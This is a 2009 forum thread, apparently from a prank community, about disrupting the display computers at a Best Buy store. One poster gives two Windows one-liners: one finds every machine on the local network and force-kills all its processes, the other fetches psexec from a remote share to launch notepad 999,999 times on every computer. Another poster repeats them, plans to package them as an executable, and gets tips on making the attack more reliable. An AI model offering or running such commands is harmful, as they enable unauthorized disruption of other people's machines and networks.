Author Topic: Best Buy  (Read 6172 times)

Offline nomadcowatbk

• PLA Guru
  • 1337 13V3L: +5/-8
Re: Best Buy
« Reply #15 on: January 21, 2009, 02:00:40 PM »
Did the Geek Squad have any idea? Better avoid that location for a while, they might call the cops if they recognize you.
Call the cops for what?  What can they do?

They'd try to charge you with something like vandalism or tresspassing. They probably also might have you on tape  or whatever from their security cameras
« Last Edit: January 21, 2009, 02:08:31 PM by nomadcowatbk »

Offline Zazen

• Cactus Zombie
  • 1337 13V3L: +34/-14
« Reply #16 on: January 21, 2009, 08:05:21 PM »
Wow, that other thread totally makes sense now that I read this one.

Here is something you can type that'll do that blue screen taskkill on all the machines on the local network:

Code: [Select]
for /F "skip=3 delims=\ " %i in ('net view') do if not %i==%computername% taskkill /S %i /FI "PID gt 0"

However, it might be funnier to make them run more programs instead of less. Type this and it'll run notepad on every computer 999999 times:

for /L %i in (1,1,999999) DO \\live.sysinternals.com\tools\psexec.exe -accepteula \\* -i -d notepad.exe
(note, the network you're on will have to allow outbound internet traffic over SMB for this to work, but that is probably true if they're just running a wireless AP without having configured it much).

Offline m0rdekai

• IBA IBA IBA
  • PLA Corporate Drone
  • 1337 13V3L: +31/-28
« Reply #17 on: January 22, 2009, 10:58:50 AM »
Wow, that other thread totally makes sense now that I read this one.

Here is something you can type that'll do that blue screen taskkill on all the machines on the local network:

for /F "skip=3 delims=\ " %i in ('net view') do if not %i==%computername% taskkill /S %i /FI "PID gt 0"

However, it might be funnier to make them run more programs instead of less. Type this and it'll run notepad on every computer 999999 times:

for /L %i in (1,1,999999) DO \\live.sysinternals.com\tools\psexec.exe -accepteula \\* -i -d notepad.exe
(note, the network you're on will have to allow outbound internet traffic over SMB for this to work, but that is probably true if they're just running a wireless AP without having configured it much).

are you aware how much i love you right now?
ima code this into a script and py2exe it.  then we'll just have to run THAT and its so much simpler.
and they allowed outbound over smb im pretty sure.

Careful Nod.  He's just a very clever spambot. 

Your moms a spambot.

Offline Zazen

• Cactus Zombie
  • 1337 13V3L: +34/-14
« Reply #18 on: January 22, 2009, 04:02:04 PM »
If you're going to put a program on the machine then you should also put psexec.exe on the machine instead of running it from the internet via \\live.sysinternals.com\tools\psexec.exe . It'll be faster and more reliable.

Also keep in mind that it'll take a few moments for psexec to run each time, so the 999999 notepads will occur somewhat gradually. It'll probably take around 5 seconds per machine for each instance of notepad.